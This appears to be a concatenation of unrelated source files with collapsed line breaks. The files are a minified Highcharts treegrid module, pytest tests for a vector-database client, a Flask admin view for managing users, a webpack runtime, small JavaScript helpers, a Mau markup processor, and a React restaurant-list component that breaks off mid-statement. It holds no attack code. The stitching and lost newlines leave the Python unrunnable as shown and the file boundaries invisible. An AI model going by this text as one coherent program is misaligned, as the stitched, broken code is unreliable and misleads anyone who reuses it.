b=d.treeGrid.collapse(a);d.brokenAxis&&(d.brokenAxis.setBreaks(b,!1),d.treeGrid.collapsedNodes&&(d.treeGrid.collapsedNodes=d.treeGrid.collapsedNodes.filter(function(b){return a.collapseStart!==b.collapseStart||a.collapseEnd!==b.collapseEnd})))})}),u(d,"afterBreaks",function(){"yAxis"===d.coll&&!d.staticScale&&d.chart.options.chart.height&&(d.isDirty=!0)}),c=F({grid:{enabled:!0},labels:{align:"left",levels:[{level:void 0},{level:1,style:{fontWeight:"bold"}}], symbol:{type:"triangle",x:-5,y:-5,height:10,width:10,padding:5}},uniqueNames:!1},c,{reversed:!0,grid:{columns:void 0}}));a.apply(d,[b,c]);f&&(d.hasNames=!0,d.options.showLastLabel=!0)}function H(b){var c=this.options;"treegrid"===c.type?(this.min=C(this.userMin,c.min,this.dataMin),this.max=C(this.userMax,c.max,this.dataMax),a(this,"foundExtremes"),this.setAxisTranslation(),this.tickmarkOffset=.5,this.tickInterval=1,this.tickPositions=this.treeGrid.mapOfPosToGridNode?this.treeGrid.getTickPositions(): []):b.apply(this,Array.prototype.slice.call(arguments,1))}var d;c.compose=function(a,c,e,g){-1===a.keepProps.indexOf("treeGrid")&&(a.keepProps.push("treeGrid"),d=g,b(a.prototype,"generateTick",r),b(a.prototype,"init",z),b(a.prototype,"setTickInterval",H),a.prototype.utils={getNode:y.getNode},t.compose(a,c,g),f.compose(a,e),v.compose(g));return a};var D=function(){function a(a){this.axis=a}a.prototype.setCollapsedStatus=function(a){var b=this.axis,c=b.chart;b.series.forEach(function(b){var d=b.options.data; if(a.id&&d){var e=c.get(a.id);b=d[b.data.indexOf(e)];e&&b&&(e.collapsed=a.collapsed,b.collapsed=a.collapsed)}})};a.prototype.collapse=function(a){var b=this.axis,c=b.options.breaks||[],d=k(a,b.max);c.push(d);a.collapsed=!0;b.treeGrid.setCollapsedStatus(a);return c};a.prototype.expand=function(a){var b=this.axis,c=b.options.breaks||[],d=k(a,b.max);a.collapsed=!1;b.treeGrid.setCollapsedStatus(a);return c.reduce(function(a,b){b.to===d.to&&b.from===d.from||a.push(b);return a},[])};a.prototype.getTickPositions= function(){var a=this.axis,b=Math.floor(a.min/a.tickInterval)*a.tickInterval,c=Math.ceil(a.max/a.tickInterval)*a.tickInterval;return Object.keys(a.treeGrid.mapOfPosToGridNode||{}).reduce(function(d,e){e=+e;!(e>=b&&e<=c)||a.brokenAxis&&a.brokenAxis.isInAnyBreak(e)||d.push(e);return d},[])};a.prototype.isCollapsed=function(a){var b=this.axis,c=b.options.breaks||[],d=k(a,b.max);return c.some(function(a){return a.from===d.from&&a.to===d.to})};a.prototype.toggleCollapse=function(a){return this.isCollapsed(a)? this.expand(a):this.collapse(a)};return a}();c.Additions=D})(c||(c={}));return c});A(f,"masters/modules/treegrid.src.js",[f["Core/Globals.js"],f["Core/Axis/TreeGridAxis.js"]],function(f,t){t.compose(f.Axis,f.Chart,f.Series,f.Tick)})}); //# sourceMappingURL=treegrid.js.map
"""Test the write database. """ import json import pytest import os import time import numpy as np from vectorai.models.deployed import ViText2Vec from vectorai.write import ViWriteClient from vectorai.errors import APIError, MissingFieldError, MissingFieldWarning from vectorai.client import ViClient from .utils import TempClientWithDocs class TestCollectionBasics: @pytest.mark.use_client def test_create_collection(self, test_client, test_collection_name, test_vector_field): collection_name = test_collection_name if collection_name in test_client.list_collections(): test_client.delete_collection(collection_name) response = test_client.create_collection( collection_name=collection_name, collection_schema={test_vector_field: 512} ) assert response is None @pytest.mark.use_client def test_prevent_collection_overwrite(self, test_client, test_collection_name): """ Test prevention of the overwriting of the collections. """ if test_collection_name not in test_client.list_collections(): test_client.create_collection(test_collection_name) with pytest.raises(APIError): response = test_client.create_collection(collection_name=test_collection_name) @pytest.mark.use_client def test_list_collections(self, test_collection_name, test_client): response = test_client.list_collections() assert response.count(test_collection_name) == 1 @pytest.mark.use_client def test_delete_collection(self, test_client, test_collection_name): response = test_client.delete_collection(collection_name=test_collection_name) assert response['status'] == 'complete' def assert_json_serializable(document, temp_json_file="test.json"): """Assert that an document is json serializable and is the same after loading back into Python. """ with open(temp_json_file, "w") as f: json.dump(document, f) return_document = json.load(open(temp_json_file, "r")) os.remove(temp_json_file) assert return_document == document class TestInsert: @pytest.mark.use_client def test_insert_documents_simple_and_collection_stats_match(self, test_client, test_collection_name): """ Testing for simple document insertion """ if test_collection_name in test_client.list_collections(): test_client.delete_collection(test_collection_name) sample_documents = test_client.create_sample_documents(10) test_client.insert_documents(test_collection_name, sample_documents) time.sleep(10) assert test_client.collection_stats(test_collection_name)['number_of_documents'] == 10 test_client.delete_collection(test_collection_name) time.sleep(3) @pytest.mark.use_client def test_inserting_documents_without_id_fields(self, test_client, test_collection_name): """ Test inserting documents if they do not have an ID field. """ if test_collection_name in test_client.list_collections(): test_client.delete_collection(test_collection_name) sample_documents = test_client.create_sample_documents(10) # Remove the ID fields {x.pop('_id') for x in sample_documents} test_client.insert_documents(test_collection_name, sample_documents) time.sleep(10) assert test_client.collection_stats(test_collection_name)['number_of_documents'] == 10 test_client.delete_collection(test_collection_name) time.sleep(3) @pytest.mark.use_client def test_inserting_documents_without_id_fields_with_overwrite(self, test_client, test_collection_name): """ Test inserting documents if they do not have an ID field. """ if test_collection_name in test_client.list_collections(): test_client.delete_collection(test_collection_name) sample_documents = test_client.create_sample_documents(10) # Remove the ID fields {x.pop('_id') for x in sample_documents} with pytest.warns(MissingFieldWarning): test_client.insert_documents(test_collection_name, sample_documents, overwrite=True) time.sleep(10) assert test_client.collection_stats(test_collection_name)['number_of_documents'] == 10 test_client.delete_collection(test_collection_name) time.sleep(3) @pytest.mark.use_client def test_inserting_documents_when_id_is_not_a_string(self, test_client, test_collection_name): """ Test inserting documents when ID is not a string """ if test_collection_name in test_client.list_collections(): test_client.delete_collection(test_collection_name) sample_documents = test_client.create_sample_documents(10) # Create integer IDs strings {x.update({'_id': int(x['_id'])}) for x in sample_documents} test_client.insert_documents(test_collection_name, sample_documents, overwrite=False) time.sleep(10) assert test_client.collection_stats(test_collection_name)['number_of_documents'] == 10 test_client.delete_collection(test_collection_name) time.sleep(3) @pytest.mark.use_client def test_inserting_documents_when_id_is_not_a_string_with_overwrite(self, test_client, test_collection_name): """ Test inserting documents when ID is not a string """ if test_collection_name in test_client.list_collections(): test_client.delete_collection(test_collection_name) sample_documents = test_client.create_sample_documents(10) # Create integer IDs strings {x.update({'_id': int(x['_id'])}) for x in sample_documents} test_client.insert_documents(test_collection_name, sample_documents, overwrite=True) time.sleep(10) assert test_client.collection_stats(test_collection_name)['number_of_documents'] == 10 test_client.delete_collection(test_collection_name) time.sleep(3) @pytest.mark.use_client def test_insert_single_document(self, test_client, test_collection_name): if test_collection_name not in test_client.list_collections(): test_client.create_collection(test_collection_name) document = {"sample_vector_": test_client.generate_vector(20), "sample_name": "hi"} response = test_client.insert_document( collection_name=test_collection_name, document=document ) assert response is None @pytest.mark.use_client def test_insert_single_document_error(self, test_client, test_collection_name): """Trigger an insert fail error """ with pytest.raises(APIError): if test_collection_name not in test_client.list_collections(): test_client.create_collection(test_collection_name) document = { "sample_vectors_": [test_client.generate_vector(20)] + [np.nan], "samplename": [["hi"]], } response = test_client.insert_document( collection_name=test_collection_name, document=document ) @pytest.mark.use_client def test_clean_up(self, test_client, test_collection_name): """Remove a collection if it is there. """ if test_collection_name in test_client.list_collections(): test_client.delete_collection(test_collection_name) assert test_collection_name not in test_client.list_collections() class TestEdit: @pytest.mark.use_client def test_setup_for_read(self, test_client, test_collection_name): """Test Setup for Read Operations""" if test_collection_name in test_client.list_collections(): test_client.delete_collection(collection_name=test_collection_name) documents = [ { "_id": "2", "document_vector_": test_client.generate_vector(vector_length=512), "attribute": "red", }, { "_id": "1", "document_vector_": test_client.generate_vector(vector_length=512), "attribute": "blue", }, ] test_client.insert_documents( collection_name=test_collection_name, documents=documents ) time.sleep(10) assert True @pytest.mark.use_client def test_edit_document(self, test_client, test_collection_name): with TempClientWithDocs(test_client, test_collection_name) as client: edits = { "_id": "1", "location": "Paris" } client.edit_document( collection_name=test_collection_name, edits=edits ) time.sleep(2) doc = client.id(test_collection_name, document_id="1") assert doc["location"] == "Paris" @pytest.mark.use_client def test_create_filter(self, test_client, test_collection_name): with TempClientWithDocs(test_client, test_collection_name) as client: doc = { 'location': "Paris" } client.insert_document(test_collection_name, doc) results = test_client.filters( test_collection_name, test_client.create_filter_query(test_collection_name, 'location', 'contains', 'paris')) assert len(results) > 0 @pytest.mark.use_client def test_create_filter_2(self, test_client, test_collection_name): with TempClientWithDocs(test_client, test_collection_name) as client: doc = { 'location': "Paris" } client.insert_document(test_collection_name, doc) results = test_client.filters( test_collection_name, test_client.create_filter_query( test_collection_name, 'location', 'exact_match', 'Paris')) assert len(results) > 0 @pytest.mark.use_client def test_create_filter_3(self, test_client, test_collection_name): with TempClientWithDocs(test_client, test_collection_name) as client: results = test_client.filters(test_collection_name, test_client.create_filter_query(test_collection_name, 'size.feet', '<=', '31')) assert len(results) > 0 @pytest.mark.use_client def test_create_filter_4(self, test_client, test_collection_name): with TempClientWithDocs(test_client, test_collection_name): results = test_client.filters(test_collection_name, test_client.create_filter_query(test_collection_name, 'insert_date_', '>=', '2020-01-01')) assert len(results) > 0 @pytest.mark.use_client def test_edit_documents(self, test_client, test_collection_name): """Test adding of an attribute """ with TempClientWithDocs(test_client, test_collection_name): edits = [ {"_id": "2", "location": "Sydney",}, {"_id": "1", "location": "New York",}, ] test_client.edit_documents(test_collection_name, edits, workers=2) doc = test_client.id(test_collection_name, document_id="2") assert doc["location"] == "Sydney" doc = test_client.id(test_collection_name, document_id="1") assert doc['location'] == 'New York' def test__write_document_nested_field(): sample = {"this": {}} ViWriteClient.set_field("this.is", doc=sample, value=[0, 2]) assert sample["this"]["is"] == [0, 2] def test__write_document_nested_field_2(): sample = {"this": {"is": {}}} ViWriteClient.set_field("this.is", doc=sample, value=[0, 2]) assert sample["this"]["is"] == [0, 2] @pytest.mark.use_client def test_encode_documents_with_deployed_model(test_client, test_text_encoder): """ Test single encoding method for models. """ documents = test_client.create_sample_documents(10) test_client.encode_documents_with_models(documents, models={'color': [test_text_encoder]}, use_bulk_encode=False) assert 'color_vector_' in documents[0].keys() assert len(documents[0]['color_vector_']) > 0 @pytest.mark.use_client def test_bulk_encode_documents_with_deployed_model(test_client, test_text_encoder): """ Test bulk encoding method for models. """ # Test when model key input is a list documents = test_client.create_sample_documents(10) test_client.encode_documents_with_models(documents, models={'color': [test_text_encoder]}, use_bulk_encode=True) assert 'color_vector_' in documents[0].keys() assert len(documents[0]['color_vector_']) > 0 del documents documents = test_client.create_sample_documents(10) test_client.encode_documents_with_models(documents, models={'color': test_text_encoder}, use_bulk_encode=True) assert 'color_vector_' in documents[0].keys() assert len(documents[0]['color_vector_']) > 0 @pytest.mark.use_client def test_multiprocess_insert(test_client, test_collection_name): NUM_OF_DOCUMENTS_INSERTED = 10 if test_collection_name in test_client.list_collections(): test_client.delete_collection(test_collection_name) time.sleep(10) documents = test_client.create_sample_documents(NUM_OF_DOCUMENTS_INSERTED) results = test_client.insert_documents(test_collection_name, documents, workers=5, overwrite=False) time.sleep(10) assert len(results['failed_document_ids']) == 0 assert test_collection_name in test_client.list_collections() assert test_client.collection_stats(test_collection_name)['number_of_documents'] == NUM_OF_DOCUMENTS_INSERTED test_client.delete_collection(test_collection_name) @pytest.mark.use_client def test_multiprocess_insert_with_error(test_client, test_collection_name): NUM_OF_DOCUMENTS_INSERTED = 100 if test_collection_name in test_client.list_collections(): test_client.delete_collection(test_collection_name) documents = test_client.create_sample_documents(NUM_OF_DOCUMENTS_INSERTED) documents.append({ '_id': '9993', 'color': np.nan }) # This should result in 1 failure results = test_client.insert_documents(test_collection_name, documents, workers=5, overwrite=False) time.sleep(10) assert len(results['failed_document_ids']) == 1 assert test_collection_name in test_client.list_collections() assert test_client.collection_stats(test_collection_name)['number_of_documents'] == NUM_OF_DOCUMENTS_INSERTED test_client.delete_collection(test_collection_name) @pytest.mark.use_client def test_multiprocess_insert_with_error_with_overwrite(test_client, test_collection_name): NUM_OF_DOCUMENTS_INSERTED = 100 if test_collection_name in test_client.list_collections(): test_client.delete_collection(test_collection_name) time.sleep(5) documents = test_client.create_sample_documents(NUM_OF_DOCUMENTS_INSERTED) documents.append({ '_id': '9993', 'color': np.nan }) # This should result in 1 failure results = test_client.insert_documents(test_collection_name, documents, workers=5, overwrite=True) time.sleep(10) assert len(results['failed_document_ids']) == 1 assert test_collection_name in test_client.list_collections() assert test_client.collection_stats(test_collection_name)['number_of_documents'] == NUM_OF_DOCUMENTS_INSERTED test_client.delete_collection(test_collection_name) @pytest.mark.use_client def test_multiprocess_with_collection_client(test_collection_client, test_collection_name): NUM_OF_DOCUMENTS_INSERTED = 100 if test_collection_client.collection_name in test_collection_client.list_collections(): test_collection_client.delete_collection() time.sleep(5) documents = test_collection_client.create_sample_documents(NUM_OF_DOCUMENTS_INSERTED) results = test_collection_client.insert_documents(documents, workers=5) time.sleep(10) assert len(results['failed_document_ids']) == 0 assert test_collection_client.collection_name in test_collection_client.list_collections() assert test_collection_client.collection_stats()['number_of_documents'] == NUM_OF_DOCUMENTS_INSERTED test_collection_client.delete_collection() @pytest.mark.use_client def test_multiprocess__with_error_with_collection_client(test_collection_client): NUM_OF_DOCUMENTS_INSERTED = 100 if test_collection_client.collection_name in test_collection_client.list_collections(): test_collection_client.delete_collection() time.sleep(5) documents = test_collection_client.create_sample_documents(NUM_OF_DOCUMENTS_INSERTED) documents.append({ '_id': 9993, 'color': np.nan }) # This should result in 1 failure results = test_collection_client.insert_documents(documents, workers=5, overwrite=True) time.sleep(10) assert len(results['failed_document_ids']) == 1 assert test_collection_client.collection_name in test_collection_client.list_collections() assert test_collection_client.collection_stats()['number_of_documents'] == NUM_OF_DOCUMENTS_INSERTED @pytest.mark.use_client def test_multiprocess_with_overwrite(test_client, test_collection_name): if test_collection_name in test_client.list_collections(): test_client.delete_collection(test_collection_name) time.sleep(5) NUM_OF_DOCS = 10 docs = test_client.create_sample_documents(NUM_OF_DOCS) test_client.insert_documents(test_collection_name, docs[0:5], workers=1, overwrite=False) response = test_client.insert_documents(test_collection_name, docs[3:5], workers=1, overwrite=True) assert response['inserted_successfully'] == 2 @pytest.mark.use_client def test_multiprocess_with_overwrite_insert(test_client, test_collection_name): if test_collection_name in test_client.list_collections(): test_client.delete_collection(test_collection_name) time.sleep(5) NUM_OF_DOCS = 10 docs = test_client.create_sample_documents(NUM_OF_DOCS) test_client.insert_documents(test_collection_name, docs[0:5], workers=1, overwrite=False) response = test_client.insert_documents(test_collection_name, docs[3:5], workers=1, overwrite=True) assert response['inserted_successfully'] == 2 @pytest.mark.use_client def test_multiprocess_overwrite(test_client, test_collection_name): if test_collection_name in test_client.list_collections(): test_client.delete_collection() time.sleep(5) NUM_OF_DOCS = 100 docs = test_client.create_sample_documents(NUM_OF_DOCS) test_client.insert_documents(test_collection_name, docs[0:5], workers=1, overwrite=False) # For document with id '3' TEST_ID = '3' id_document = test_client.id(test_collection_name, TEST_ID) test_client.set_field('test.field', id_document, 'stranger') docs[3] = id_document print(docs[3]) docs[3].update({'_id': '3'}) response = test_client.insert_documents(test_collection_name, docs[3:5], workers=1, overwrite=True) id_document = test_client.id(test_collection_name, TEST_ID) assert test_client.get_field('test.field', id_document) == 'stranger' time.sleep(5) test_client.delete_collection(test_collection_name) @pytest.mark.use_client def test_multiprocess_not_overwrite(test_client, test_collection_name): if test_collection_name in test_client.list_collections(): test_client.delete_collection(test_collection_name) time.sleep(5) NUM_OF_DOCS = 100 docs = test_client.create_sample_documents(NUM_OF_DOCS) test_client.insert_documents(test_collection_name, docs[0:5], workers=1, overwrite=False) # For document with id '3' TEST_ID = '3' id_document = test_client.id(test_collection_name, TEST_ID) test_client.set_field('test.field', id_document, 'stranger') docs[3] = id_document docs[3].update({'_id': '3'}) response = test_client.insert_documents(test_collection_name, docs[3:5], workers=1, overwrite=False) id_document = test_client.id(test_collection_name, TEST_ID) with pytest.raises(MissingFieldError): test_client.get_field('test.field', id_document) time.sleep(5) test_client.delete_collection(test_collection_name) @pytest.mark.use_client def test_multiprocess_overwrite_collection_client(test_collection_client, test_collection_name): if test_collection_client.collection_name in test_collection_client.list_collections(): test_collection_client.delete_collection() time.sleep(5) NUM_OF_DOCS = 10 docs = test_collection_client.create_sample_documents(NUM_OF_DOCS) test_collection_client.insert_documents(docs[0:5], workers=1, overwrite=False) # For document with id '3' TEST_ID = '3' id_document = test_collection_client.id(TEST_ID) test_collection_client.set_field('test.field', id_document, 'stranger') docs[3] = id_document docs[3].update({'_id': '3'}) response = test_collection_client.insert_documents(docs[3:5], workers=1, overwrite=True) id_document = test_collection_client.id(TEST_ID) assert test_collection_client.get_field('test.field', id_document) == 'stranger' time.sleep(5) test_collection_client.delete_collection() @pytest.mark.use_client def test_multiprocess_not_overwrite_collection_client(test_collection_client, test_collection_name): NUM_OF_DOCS = 10 docs = test_collection_client.create_sample_documents(NUM_OF_DOCS) test_collection_client.insert_documents(docs[0:5], workers=1, overwrite=False) # For document with id '3' TEST_ID = '3' id_document = test_collection_client.id(TEST_ID) test_collection_client.set_field('test.field', id_document, 'stranger') docs[3] = id_document docs[3].update({'_id': '3'}) response = test_collection_client.insert_documents(docs[3:5], workers=1, overwrite=False) id_document = test_collection_client.id(TEST_ID) with pytest.raises(MissingFieldError): test_collection_client.get_field('test.field', id_document) time.sleep(5) test_collection_client.delete_collection() def test_dummy_vector(test_client): """ Test the dummy vector """ assert len(test_client.dummy_vector(512)) == 512 def test_set_field_on_new_field(test_client): """ Assert when set on new field. """ doc = {} test_client.set_field('balls', doc, 3) assert doc['balls'] == 3 def test_set_field_on_new_dict(test_client): doc = {} test_client.set_field('check.balls', doc, 3) assert test_client.get_field('check.balls', doc) == 3 def test_vector_name(test_client): text_encoder = ViText2Vec(os.environ['VI_USERNAME'], os.environ['VI_API_KEY']) test_client.set_name(text_encoder, 'vectorai_text') vector_name = test_client._get_vector_name_for_encoding("color", text_encoder, model_list=[text_encoder]) assert vector_name == "color_vectorai_text_vector_" def test_vector_name_2(test_client): text_encoder = ViText2Vec(os.environ['VI_USERNAME'], os.environ['VI_API_KEY']) text_encoder_2 = ViText2Vec(os.environ['VI_USERNAME'], os.environ['VI_API_KEY']) test_client.set_name(text_encoder, "vectorai") test_client.set_name(text_encoder_2, "vectorai_2") vector_name = test_client._get_vector_name_for_encoding("color", text_encoder, model_list=[text_encoder, text_encoder_2]) assert vector_name == "color_vectorai_vector_" vector_name = test_client._get_vector_name_for_encoding("color", text_encoder_2, model_list=[text_encoder, text_encoder_2]) assert vector_name == 'color_vectorai_2_vector_' def test_vector_name_same_name(test_client): text_encoder = ViText2Vec(os.environ['VI_USERNAME'], os.environ['VI_API_KEY']) with pytest.raises(ValueError): vector_name = test_client._check_if_multiple_models_have_same_name(models={'color':[text_encoder, text_encoder]}) def test_encode_documents_With_models_using_encode(test_client): docs = test_client.create_sample_documents(5) text_encoder = ViText2Vec(os.environ['VI_USERNAME'], os.environ['VI_API_KEY']) test_client.set_name(text_encoder, "vectorai_text") test_client.encode_documents_with_models_using_encode(docs, models={'color': [text_encoder]}) assert 'color_vectorai_text_vector_' in docs[0].keys() @pytest.mark.use_client def test_raises_warning_if_no_id(test_client, test_collection_name): docs = test_client.create_sample_documents(10) {x.pop('_id') for x in docs} with pytest.warns(MissingFieldWarning) as record: test_client.insert_documents(test_collection_name, docs) assert record[1].message.args[0] == test_client.NO_ID_WARNING_MESSAGE @pytest.mark.use_client def test_raises_warning_if_only_one_id_is_present(test_client, test_collection_name): docs = test_client.create_sample_documents(10) {x.pop('_id') for x in docs[1:]} with pytest.warns(MissingFieldWarning) as record: test_client.insert_documents(test_collection_name, docs) assert record[0].message.args[0] == test_client.NO_ID_WARNING_MESSAGE @pytest.mark.use_client def test_retrieve_and_encode_simple(test_client, test_collection_name): """Test retrieving documents and encoding them with vectors. """ VECTOR_LENGTH = 100 def fake_encode(x): return test_client.generate_vector(VECTOR_LENGTH) with TempClientWithDocs(test_client, test_collection_name, 100) as client: results = client.retrieve_and_encode(test_collection_name, models={'country': fake_encode}) assert list(client.collection_schema(test_collection_name)['country_vector_'].keys())[0] == 'vector' assert len(results['failed_document_ids']) == 0 assert 'country_vector_' in client.collection_schema(test_collection_name) docs = client.retrieve_documents(test_collection_name)['documents'] assert len(docs[0]['country_vector_']) == VECTOR_LENGTH @pytest.mark.use_client def test_bulk_edit_documents(test_client, test_collection_name): with TempClientWithDocs(test_client, test_collection_name, 100) as client: edits = test_client.create_sample_documents(100) {x.update({'favorite_singer': 'billie eilish'}) for x in edits} response = client.bulk_edit_documents(test_collection_name, edits) assert response['edited_successfully'] == len(edits) # Retrieve the documents docs = client.retrieve_documents(test_collection_name, include_fields=['favorite_singer'], page_size=1)['documents'] for doc in docs: assert doc['favorite_singer'] == 'billie eilish'
export { default } from 'ember-debounced-inputs/components/debounced-checkbox';
"""Define the route to the admin interface""" from uuid import uuid4 from flask import ( render_template, redirect, url_for, request, session, current_app, flash, ) from flask_login import login_required, current_user from module.server import messages from module.server.view.admin import bp from module.server.view.admin.forms import ( SearchUserForm, InteractButtonsForm, RegisterForm, ) from module.server.models.user import User, Tariffs, State from module.server.models.payment_cards import Card @bp.route("/", methods=["GET", "POST"]) @login_required def admin_view(): """ View for the admin page. Access only for admin. If the user tries to enter this route without logging in, he will be automatically redirected to the login page. If the user tries to enter this route without permission(user is not admin), he will be automatically redirected to the cabinet page. Methods: GET, POST """ if current_user.username != "admin": # If current user is not admin redirect him to the cabinet return redirect(url_for("cabinet.cabinet_view")) search_form = SearchUserForm() interact_form = InteractButtonsForm() # activate, deactivate, delete and register buttons if request.method == "POST": # if any button was pressed data = request.form if data.get("search_button"): # if search button was pressed "remember" the username to work with in the future session["_username_search_form"] = data.get("username") elif data.get("register_button"): # if register button was pressed return redirect(url_for("admin.register_view")) elif data.get("activate_button"): # if activate button was pressed user = User.query.filter_by(username=session.get("_username_search_form")).first() user.change_state() flash(messages["activate_state_success"], "info") elif data.get("deactivate_button"): # if deactivate button was pressed user = User.query.filter_by(username=session.get("_username_search_form")).first() user.change_state(deactivate=True) flash(messages["deactivate_state_success"], "info") elif data.get("delete_button"): # if delete button was pressed user = User.query.filter_by(username=session.get("_username_search_form")).first() user.delete_from_db() flash(messages["success"], "info") # Data for the table with main info data_general_table = dict( num_users=len(User.query.all()), num_active_users=len(User.query.filter_by(state=State.activated_state.value).all()), num_non_used_cards=len(Card.query.all()), total_debt=sum(debt_acc.balance for debt_acc in User.query.filter(User.balance < 0).all()), ) return render_template( "admin/admin.html", title="Admin", data_general_table=data_general_table, search_form=search_form, interact_form=interact_form, user=User.query.filter_by(username=session.get("_username_search_form")).first(), ) @bp.route("/register", methods=["GET", "POST"]) @login_required def register_view(): """ New user registration view. Access only for admin. If the user tries to enter this route without logging in, he will be automatically redirected to the login page. If the user tries to enter this route without permission(user is not admin), he will be automatically redirected to the cabinet page. Methods: GET, POST """ if current_user.username != "admin": # If current user is not admin redirect him to the cabinet return redirect(url_for("cabinet.cabinet_view")) register_form = RegisterForm() # Set selector options register_form.tariff_select.choices = [tariff.value["tariff_name"] for tariff in list(Tariffs)] if request.method == "POST": data = request.form if register_form.validate_on_submit() or (data and current_app.testing): # if admin click the 'Register' button or there is data in the request while testing app # Create new user new_user = User( name=data.get("name"), phone=data.get("phone"), email=data.get("email"), username=data.get("username"), password=data.get("password"), tariff=data.get("tariff_select"), address=data.get("address"), state=State.activated_state.value, ) try: # if everything is okay - admin will be redirected to the admin page # and user will be created new_user.save_to_db() flash(messages["success_register"], "info") return redirect(url_for("admin.admin_view")) except ValueError as e: # error saving to the database # otherwise admin will be redirected to the register page # the user will not be created current_app.logger.info("Error while saving new user to the database - {0}".format(e)) flash(messages["failure"], "warning") return redirect(url_for("admin.register_view")) return render_template("auth/register.html", title="Register new user", form=register_form)
!function(e){function r(data){for(var r,n,f=data[0],l=data[1],d=data[2],i=0,h=[];i<f.length;i++)n=f[i],Object.prototype.hasOwnProperty.call(o,n)&&o[n]&&h.push(o[n][0]),o[n]=0;for(r in l)Object.prototype.hasOwnProperty.call(l,r)&&(e[r]=l[r]);for(v&&v(data);h.length;)h.shift()();return c.push.apply(c,d||[]),t()}function t(){for(var e,i=0;i<c.length;i++){for(var r=c[i],t=!0,n=1;n<r.length;n++){var l=r[n];0!==o[l]&&(t=!1)}t&&(c.splice(i--,1),e=f(f.s=r[0]))}return e}var n={},o={4:0},c=[];function f(r){if(n[r])return n[r].exports;var t=n[r]={i:r,l:!1,exports:{}};return e[r].call(t.exports,t,t.exports,f),t.l=!0,t.exports}f.e=function(e){var r=[],t=o[e];if(0!==t)if(t)r.push(t[2]);else{var n=new Promise((function(r,n){t=o[e]=[r,n]}));r.push(t[2]=n);var c,script=document.createElement("script");script.charset="utf-8",script.timeout=120,f.nc&&script.setAttribute("nonce",f.nc),script.src=function(e){return f.p+""+{2:"7cbf189abca7f25ecc37",3:"c6c980fe7e906f2711b5"}[e]+".js"}(e);var l=new Error;c=function(r){script.onerror=script.onload=null,clearTimeout(d);var t=o[e];if(0!==t){if(t){var n=r&&("load"===r.type?"missing":r.type),c=r&&r.target&&r.target.src;l.message="Loading chunk "+e+" failed.\n("+n+": "+c+")",l.name="ChunkLoadError",l.type=n,l.request=c,t[1](l)}o[e]=void 0}};var d=setTimeout((function(){c({type:"timeout",target:script})}),12e4);script.onerror=script.onload=c,document.head.appendChild(script)}return Promise.all(r)},f.m=e,f.c=n,f.d=function(e,r,t){f.o(e,r)||Object.defineProperty(e,r,{enumerable:!0,get:t})},f.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},f.t=function(e,r){if(1&r&&(e=f(e)),8&r)return e;if(4&r&&"object"==typeof e&&e&&e.__esModule)return e;var t=Object.create(null);if(f.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&r&&"string"!=typeof e)for(var n in e)f.d(t,n,function(r){return e[r]}.bind(null,n));return t},f.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return f.d(r,"a",r),r},f.o=function(object,e){return Object.prototype.hasOwnProperty.call(object,e)},f.p="/<nuxt>/_nuxt/",f.oe=function(e){throw console.error(e),e};var l=window.webpackJsonp=window.webpackJsonp||[],d=l.push.bind(l);l.push=r,l=l.slice();for(var i=0;i<l.length;i++)r(l[i]);var v=d;t()}([]);
'use strict' module.exports = function promisify (fn) { return function (...args) { return new Promise((resolve, reject) => { fn.apply(this, args.slice(0, fn.length - 1).concat((err, data) => { if (err) reject(err) else resolve(data) })) }) } }
# -*- coding: utf-8 -*- from pkg_resources import DistributionNotFound, get_distribution try: # Change here if project is renamed and does not equal the package name dist_name = __name__ __version__ = get_distribution(dist_name).version except DistributionNotFound: __version__ = "unknown" finally: del get_distribution, DistributionNotFound from mau.parsers.main_parser import MainParser from mau.parsers.nodes import DocumentNode from mau.visitors.html_visitor import HTMLVisitor from mau.visitors.asciidoctor_visitor import AsciidoctorVisitor class Mau: def __init__( self, config, target_format, default_templates=None, templates_directory=None ): self.config = config self.target_format = target_format self.default_templates = default_templates self.templates_directory = templates_directory self.no_document = config.get("no_document", False) self.variables = {} def process(self, text): self.config["target_format"] = self.target_format parser = MainParser(variables=self.config) parser.load(text) parser.parse() self.variables = parser.variables document = DocumentNode(parser.nodes, self.no_document) ast = document.asdict() if self.target_format == "html": visitor_class = HTMLVisitor elif self.target_format == "asciidoctor": visitor_class = AsciidoctorVisitor visitor = visitor_class( default_templates=self.default_templates, templates_directory=self.templates_directory, config=self.config, toc=[i.asdict() for i in parser.toc], footnotes=[i.asdict() for i in parser.footnotes], ) return visitor.visit(ast)
import { ZoomOut16 } from '..'; export default ZoomOut16;
import React from 'react'; import { connect } from 'react-redux'; import { showModal } from '../../actions/Modals'; import RestaurantsListItem from '../../components/RestaurantsListItem/index'; import RestaurantFilterModal from '../../components/ChiliModal/components/RestaurantFilterModal'; import { restaurantSearch, restaurantListTag } from '../../api/application/restaurant'; import Loading from '../../components/ChiliLoading'; import NavigationBar from '../../components/NavigationBar'; import { getRegionBySlug } from '../../api/application/region'; import SearchInput, { createFilter } from 'react-search-input'; import icon from '../../images/icons/search_no_result.png'; const KEYS_TO_FILTERS = ['name']; const otherFilter = { "hasDiscount": "تخفیف دار", "deliveryBy": "موتوچیلی", "created": "جدیدترین ها", "speed": "زمان ارسال", "rating": "بالاترین امتیاز", "price": "سطح اقتصادی" } import './style.scss'; /* eslint-disable react/prefer-stateless-function */ class RestaurantsList extends React.Component { constructor(props) { super(props); this.state = { loading: true, restaurantList: [], citySlug: props.match.params.citySlug, pointSlug: props.match.params.pointSlug, searchTerm: '', filters: [], restaurantListTag: {}, filterShow: false, filterValidation: false, concatTag: [], mapCenter:'' }; } componentDidMount() { if(this.state.pointSlug){ getRegionBySlug(this.state.pointSlug).then( response => { if (response.status) { const { cityId, mapCenter } = response.result; this.setState({ cityId, mapCenter }); this.fetchRestauranList(cityId, mapCenter) } } ) }else{ this.setState({ cityId:this.props.userPosition.cityId, },()=>{ this.fetchRestauranList(this.state.cityId) }); } restaurantListTag().then( response => { if (response.status) { const res = response.result; this.setState({ restaurantListTag: res, concatTag: res.restaurantType.concat(res.foodType) }, () => { this.setState({ filterShow: true }) }) } } ) } fetchRestauranList = (cityId, mapCenter) => { restaurantSearch( cityId, `${ mapCenter ? mapCenter.lat + ',' + mapCenter.lon : '' }`, this.tagGenerator(this.state.filters)).then( response => { const restaurantList = response.result.data; const tagsCount = response.result.tagsCount; this.setState({ 